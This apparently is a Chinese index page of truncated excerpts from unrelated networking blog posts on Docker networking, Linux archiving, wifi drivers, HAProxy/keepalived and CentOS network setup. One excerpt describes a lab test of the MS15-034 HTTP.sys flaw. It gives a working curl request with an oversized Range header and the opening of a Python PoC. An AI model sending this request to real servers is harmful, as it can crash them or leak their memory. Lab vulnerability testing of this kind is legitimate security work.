iNet

DOCKER的内置OVERLAY网络 内置跨主机的网络通信一直是Docker备受期待的功能，在1.9版本之前，社区中就已经有许多第三方的工具或方法尝试解决这个问题，例如Macvlan、Pipework、Flannel、Weave等。 虽然这些方案在实现细节上存在很多差异，但其思路无非分为两种： 二层VLAN网络和Overlay网络 简单来说，二层VLAN网络解决跨主机通信的思路是把原先的网络架构改造为互通的大二层网络，通过特定网络设备直接路由，实现容器点到点的之间通信。这种方案在传输效率上比Overlay网络占优，然而它也存在一些固有的问题。 这种方法需要二层网络设备支持，通用性和灵活性不如后者。 由于通常交换机可用的VLAN数量都在4000个左右，这会对容器集群规模造成限制，远远不能满足公有云或大型私有云的部署需求； 大型数据中心部署VLAN，会导致任何一个VLAN的广播数据会在整个数据中心内泛滥，大量消耗网络带宽，带来维护的困难。 相比之下， Overlay网络是指在不改变现有网络基础设施的前提下，通过某种约定通信协议，把二层报文封装在IP报文之上的新的数据格式。这样不但能够充分利用成熟的IP路由协议进程数据分发；而且在Overlay技术中采用扩展的隔离标识位数，能够突破VLAN的4000数量限制支持高达16M的用户，并在必要时可将广播流量转化为组播流量，避免广播数据泛滥。

第12章 Linux系统管理-打包与压缩 第12章 Linux系统管理-打包与压缩 1. 压缩包概述 2. Zip打包压缩 3. Gzip打包压缩 4. Tar打包压缩 5. Linux打包与压缩习题 6. 显示时间命令 7. 如何让系统自动同步时间 1. 压缩包概述 1. 什么是压缩包 xxxxxxxxxx ​ 就是将多个文件和目录合并为一个特殊的文件 ​ 2. 为什么使用压缩包 xxxxxxxxxx ​ 1 .减少占用的体积 ​ 2 .加快网络的传输 3. Windows的压缩和Linux的有什么不同 xxxxxxxxxx ​ windows: zip rar(linux不支持) ​ linux: zip tar.gz tar.bz2 .gz ​ 如果希望windows的软件能被linux解压,或者linux的软件包被windows能识别,选择zip. ​ PS: 压缩包的后缀不重要,但一定要携带. ​ 4. Linux下常见的压缩包类型 格式 压缩工具 .zip zip压缩工具 .gz gzip压缩工具，只能压缩文件，会删除源文件（通常配合tar使用） .bz2 bzip2压缩工具，只能压缩文件，会删除源文件（通常配合tar使用） .tar.gz 先使用tar命令归档打包，然后使用gzip压缩 .tar.bz2 先使用tar命令归档打包，然后使用bzip压缩 2.

一步一步来， 先说环境： 我的电脑是HP PHILIPS系列，ubuntu版本是16.04 背景： win10安装ubuntu后发现无法连接wifi（但win10系统可以连接WIFI），在ubuntu的系统设置--》软件更新--》附加驱动里面也加载不出来......尝试了网上说的各种方法，决定手动安装网卡驱动。 步骤： 1，首先要保证ubuntu系统可以通过有线的方式连上网，因为后面需要联网下载驱动。这里你可以用网线，也可以用手机的USB共享网络。我用的是后一种方法，手机是荣耀10，启动共享网络的步骤依次为：设置--》无线和网络--》移动网络共享--》USB共享网络，然后ubuntu右上角就可以看见有线方式连接的网络了。 2，在安装驱动之前首先保证你电脑的secure boot是disabled的状态，不然可能驱动没法正常装好。以我这台电脑为例，开机时长按F10可以进入BIOS程序，然后： 在里面选择：安全--》安全引导配置，这时候会出现一个红色的引导配置界面： 然后F10接受，将里面的“安全引导改成禁用”，“旧支持改成启用” 最后：文件--》保存更改并退出。 3，开机，在ubuntu中检查网卡类型，在终端输入： lspci | grep -i net 我的输出为： 可以看出第一条对应的就是8821CE对应的网卡，所以直接安装这个驱动就好了。 4，安装8821CE网卡驱动

自己的服务器到期，转移自己博客内容至此。 haproxy官网： www.haproxy.org keepalived官网： www.keepalived.org 本站下载： haproxy-1.8.3.tar.gz 本站下载： keepalived-1.4.0.tar.gz 本站下载： keepalived启动服务文件 环境： web01： 10.8.8.51 centos7 web02： 10.8.8.52 centos7 haproxy_master：10.8.8.53 centos7 vip：10.8.8.55 haproxy_backup：10.8.8.54 centos7 vip：10.8.8.55 访问测试端：windows 10 iptables防火墙允许两台keepalived机子互访： 在haproxy_master上添加： -A INPUT -s 10.8.8.54 -j ACCEPT 在haproxy_backup上添加：-A INPUT -s 10.8.8.55 -j ACCEPT 一、安装haproxy 1 $ cd /home/eleven/tools/ # 进入任意存放安装包目录 2 $ wget http://www.haproxy.org/download/1.8/src/haproxy-1.8.3 .tar.gz 3 # 下载haproxy1.8

1.1.1 漏洞描述 在2015年4月安全补丁日，微软发布的众多安全更新中，修复了HTTP.sys中一处允许远程执行代码漏洞，编号为：CVE-2015-1635（MS15-034 ）。利用HTTP.sys的安全漏洞，攻击者只需要发送恶意的http请求数据包，就可能远程读取IIS服务器的内存数据，或使服务器系统蓝屏崩溃。根据公告显示，该漏洞对服务器系统造成了不小的影响，主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 1.1.2 漏洞测试 环境搭建： 靶机：　　win7（192.168.80.130） 攻击机：　kali（192.168.80.129） （1）使用curl工具进行测试，测试命令： curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615" 测试结果截图： （2）使用POC测试，代码为： import socket import random ipAddr = " 192.168.80.130 " hexAllFfff = "

一 实验原理 所需硬件：树莓派 3B，TP-LINK WiFi模块，笔记本电脑，网线 所需软件： Putty、远程桌面链接、python、cmd界面 树莓派 3B是 只有信用卡大小的微型电脑，其系统基于 Linux 。在 WIFI网络互传测试实验中作为服务器Server端，接收PC端的链接请求，并向其发射数据。 TP-LINK WiFi模块搭建在树莓派3B上为树莓派3B链接无线网络。 PC端作为客户端向树莓派3B发送链接请求，链接上后接收树莓派3B发送的数据。 无线网络为树莓派和 PC端提供同一个网络信号。 网线首次连接树莓派获取 IP。 二 实验步骤 树莓派安装系统，搭建 TP-LINK WiFi模块，。 Putty第一次链接树莓派可以通过网线链接获得一个IP地址，进入连接状态输入pi与密码raspberry，可以利用远程桌面连接工具连接到树莓派的桌面进行操作,并且设置无线的静态IP 设置静态 IP步骤： 1）sudo vim /etc/dhcpcd.conf 2）interface wlan1 static ip_address=192.168.1.133/24 static routers=192.168.1.1 static domain_name_servers=192.168.1.1 eth0是有线的配置 , wlan0是无线配置 ip_address就是静态IP ,

(1).Docker的四种网络模式 　　Docker有以下四种模式，通过--net=[参数]选项（现在也可以使用--network [参数]）指定： 　　　　host模式：使用宿主机的IP地址和端口。使用--net=host指定。 　　　　container模式：和一个指定容器共享IP和端口。使用--net=container:[容器实例名称或ID]指定。 　　　　none模式：关闭容器的网络功能。使用--net=none指定。 　　　　 bridge模式：为容器分配IP，并将容器连接到docker0虚拟网桥，通过docker0网桥以及Iptables nat表配置，实现与宿主机通信。默认模式，使用--net=bridge指定。 　　默认选择bridge的情况下，容器启动后会通过DHCP自动获取一个地址。在CentOS7系统上，docker环境下，如果想要给容器分配一个固定IP（可以和宿主机同网段），可以使用pipework脚本（ 网络模式选择none ）。 　　 注意1：docker默认dridge模式相当于VMware中NAT模式；pipework脚本给容器分配固定IP，相当于VMware中桥接模式。 　　 注意2：当容器重启时，pipework设置的IP会自动消失，需要重新设置。 (2).为容器配置静态IP 　1）配置桥接网络 [root@youxi1 ~]# yum -y

ifconfig命令 网络配置 ifconfig命令 被用于配置和显示Linux内核中网络接口的网络参数。用ifconfig命令配置的网卡信息，在网卡重启后机器重启后，配置就不存在。要想将上述的配置信息永远的存的电脑里，那就要修改网卡的配置文件了。 语法 ifconfig(参数) 参数 add<地址>：设置网络设备IPv6的 ip 地址； del<地址>：删除网络设备IPv6的IP地址； down：关闭指定的网络设备； <hw<网络设备类型><硬件地址>：设置网络设备的类型与硬件地址； io_addr<I/O地址>：设置网络设备的I/O地址； irq<IRQ地址>：设置网络设备的IRQ； media<网络媒介类型>：设置网络设备的媒介类型； mem_start<内存地址>：设置网络设备在主内存所占用的起始地址； metric<数目>：指定在计算数据包的转送次数时，所要加上的数目； mtu<字节>：设置网络设备的MTU； netmask<子网掩码>：设置网络设备的子网掩码； tunnel<地址>：建立IPv4与IPv6之间的隧道通信地址； up：启动指定的网络设备； -broadcast<地址>：将要送往指定地址的数据包当成广播数据包来处理； -pointopoint<地址>：与指定地址的网络设备建立直接连线，此模式具有保密功能； -promisc

为了接近实际环境我们这里采用的是CentOS 7V / iRedMail 1.2V 进行安装。 下载地址: https://www.iredmail.org/ 同时为了使自己安装是正确或者符合自己心仪的环境，建议本地安装virtualbox，进行多次测试、调试、安装等。 准备环境 CentOS 7V 可以从阿里云镜像下载。阿里云的镜像优势这里就说一下， 下载速度快 。 下载地址: https://developer.aliyun.com/mirror/centos 安装CentOS 7V 需要注意的是： 网络设置 修改服务器主机名（hostname） 注:我自己的是:mail.walker.com，如果没设置，可以进入系统通过命令修改 再没有别的特别注意的安装正常的安装。我这里选择的最小安装。 更新环境 更新系统的依赖，并且升级的最新版本。 yum update 查看环境网络 # 默认网络工具 [root@mail ~]# ip addr : lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host

参考： http://tieba.baidu.com/p/3233996339#57290767555l 在CentOS中配置静态IP后不生效。 解决办法： 将 /etc/sysconfig/network-scripts/ifcfg-eth0文件中的 DEVICE=eth0注释掉 解决过程： 一开始，配置文件/etc/sysconfig/network-scripts/ifcfg-eth0内容如下： TYPE= Ethernet PROXY_METHOD = none BROWSER_ONLY = no BOOTPROTO = static DEFROUTE = yes NM_CONTROLLED = " no " IPV4_FAILURE_FATAL = no IPV6INIT = yes IPV6_AUTOCONF = yes IPV6_DEFROUTE = yes IPV6_FAILURE_FATAL = no IPV6_ADDR_GEN_MODE =stable- privacy NAME = eth0 DEVICE = eth0 ONBOOT = yes IPADDR = 192.168 . 30.140 NETMASK = 255.255 . 255.0 GETWAY = 192.168 . 1.1 DNS1 = 114.114 . 114.114